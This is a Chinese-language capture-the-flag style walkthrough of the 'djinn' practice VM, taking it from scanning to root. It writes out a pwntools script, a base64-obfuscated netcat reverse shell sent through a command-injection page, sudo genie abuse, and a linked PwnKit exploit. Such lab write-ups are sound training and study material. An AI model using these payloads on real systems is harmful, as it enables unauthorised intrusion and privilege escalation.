OSCP 靶场
靶场介绍
djinn |
easy |
ftp使用、端口敲打、python 脚本编写、命令执行漏洞、sudo—genie 提权、程序分析、pkexec提权 |
信息收集
主机发现
端口扫描
┌──(root㉿kali)-[~]
└─# nmap -sV -A -p- -T4 192.168.1.47
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-22 02:36 EST
Nmap scan report for 192.168.1.47
Host is up (0.00068s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.1.129
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 0 0 11 Oct 20 2019 creds.txt
| -rw-r--r-- 1 0 0 128 Oct 21 2019 game.txt
|_-rw-r--r-- 1 0 0 113 Oct 21 2019 message.txt
22/tcp filtered ssh
1337/tcp open waste?
| fingerprint-strings:
| NULL:
| ____ _____ _
| ___| __ _ _ __ ___ ___ |_ _(_)_ __ ___ ___
| x20/ _ x20 | | | | '_ ` _ x20/ _ n| |_| | (_| | | | | | | __/ | | | | | | | | | __/
| ____|__,_|_| |_| |_|___| |_| |_|_| |_| |_|___|
| Let's see how good you are with simple maths
| Answer my questions 1000 times and I'll give you your gift.
| '-', 3)
| RPCCheck:
| ____ _____ _
| ___| __ _ _ __ ___ ___ |_ _(_)_ __ ___ ___
| x20/ _ x20 | | | | '_ ` _ x20/ _ n| |_| | (_| | | | | | | __/ | | | | | | | | | __/
| ____|__,_|_| |_| |_|___| |_| |_|_| |_| |_|___|
| Let's see how good you are with simple maths
| Answer my questions 1000 times and I'll give you your gift.
|_ '+', 4)
7331/tcp open http Werkzeug httpd 0.16.0 (Python 2.7.15+)
|_http-server-header: Werkzeug/0.16.0 Python/2.7.15+
|_http-title: Lost in space
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port1337-TCP:V=7.94%I=7%D=2/22%Time=65D6F989%P=x86_64-pc-linux-gnu%r(NU
SF:LL,1BC,"x20x20____x20x20x20x20x20x20x20x20x20x20x20x20x2
SF:0x20x20x20x20x20x20x20x20x20x20x20_____x20_x20x20x20x20
SF:x20x20x20x20x20x20x20x20x20x20x20x20nx20/x20___|x20__
SF:x20_x20_x20__x20___x20x20x20___x20x20|_x20x20x20_(_)_x20
SF:__x20___x20x20x20___x20n|x20|x20x20_x20/x20_`x20|x20'_
SF:x20`x20_x20\x20/x20_x20\x20x20x20|x20|x20|x20|x20'_x
SF:20`x20_x20\x20/x20_x20\n|x20|_|x20|x20(_|x20|x20|
SF:x20|x20|x20|x20|x20x20__/x20x20x20|x20|x20|x20|x20
SF:|x20|x20|x20|x20|x20x20__/nx20\____|\__,_|_|x20|_|
SF:x20|_|\___|x20x20x20|_|x20|_|_|x20|_|x20|_|\___|n
SF:x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x2
SF:0x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x
SF:20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20
SF:nnLet'sx20seex20howx20goodx20youx20arex20withx20simplex20maths
SF:nAnswerx20myx20questionsx201000x20timesx20andx20I'llx20givex20
SF:youx20yourx20gift.n(4,x20'-',x203)n>x20")%r(RPCCheck,1BC,"x2
SF:0x20____x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x
SF:20x20x20x20x20x20x20x20x20_____x20_x20x20x20x20x20x20x2
SF:0x20x20x20x20x20x20x20x20x20nx20/x20___|x20__x20_x20_x
SF:20__x20___x20x20x20___x20x20|_x20x20x20_(_)_x20__x20___x
SF:20x20x20___x20n|x20|x20x20_x20/x20_`x20|x20'_x20`x20_x
SF:20\x20/x20_x20\x20x20x20|x20|x20|x20|x20'_x20`x20_x2
SF:0\x20/x20_x20\n|x20|_|x20|x20(_|x20|x20|x20|x20|
SF:x20|x20|x20x20__/x20x20x20|x20|x20|x20|x20|x20|x20
SF:|x20|x20|x20x20__/nx20\____|\__,_|_|x20|_|x20|_|\_
SF:__|x20x20x20|_|x20|_|_|x20|_|x20|_|\___|nx20x20x2
SF:0x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x
SF:20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20
SF:x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20nnLet'sx2
SF:0seex20howx20goodx20youx20arex20withx20simplex20mathsnAnswerx2
SF:0myx20questionsx201000x20timesx20andx20I'llx20givex20youx20your
SF:x20gift.n(7,x20'+',x204)n>x20");
MAC Address: 08:00:27:9F:39:C8 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Unix
从ftp 匿名访问中获取提示,我们访问1337 端口会被一直重置
这里提示计算1000次才通关,我们使用python来写个脚本
import pwn
import time
c = pwn.remote('192.168.1.47', '1337')
c.recvuntil('gift.n')
count=0
while count < 1001:
count += 1
data = c.recvuntil(b")").decode()
c.recv()
print(data)
num1, num2, todo = int(data[1]), int(data[9]), data[5]
if todo == "+":
answer= num1 + num2
elif todo == '-':
answer= num1 - num2
elif todo == '*':
answer= num1 * num2
elif todo == '/':
answer= num1 / num2
c.send((str(answer) + "nr").encode())
print(answer, count)
time.sleep(0.5)
print(c.recv().decode())
重新扫描端口,可以发现22端口开放了。
目录扫描
通过目录扫描到wish 目录
┌──(root㉿kali)-[~]
└─# gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.1.47:7331 -x html,php,txt -e
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.47:7331
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: html,php,txt
[+] Expanded: true
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
http://192.168.1.47:7331/wish (Status: 200) [Size: 385]
可以看到直接就是一个命令执行
权限获取
使用https://www.revshells.com/ 生成反弹shell,这里正常代理反弹不了,需要base64 获取其他编码
echo ` echo "cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnxiYXNoIC1pIDI+JjF8bmMgMTkyLjE2OC4xLjEyOSA4OTg5ID4vdG1wL2Y=" | base64 -d ` | sh -
权限提升
在nitish 用户的隐藏目录下找到ssh 登录密码
https://gtfobins.github.io/gtfobins/genie/
sudo -u sam /usr/bin/genie b -cmd
lago程序运行后选择第2个选项猜数字游戏,它会让你从1-100选一个数,当你猜中了就会返回shell
执行如下命令,然后我们一直输入2,直到进行shell,提权到root
while true;do sudo /root/lago; done
补充
也可以使用pkexec 直接提权到root 权限
find / -perm -u=s -type f 2>/dev/null
使用如下exp 直接提权到root 权限
https://github.com/luijait/PwnKit-Exploit
End
“点赞、在看与分享都是莫大的支持”
原文始发于微信公众号(贝雷帽SEC):【OSCP】djinn
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论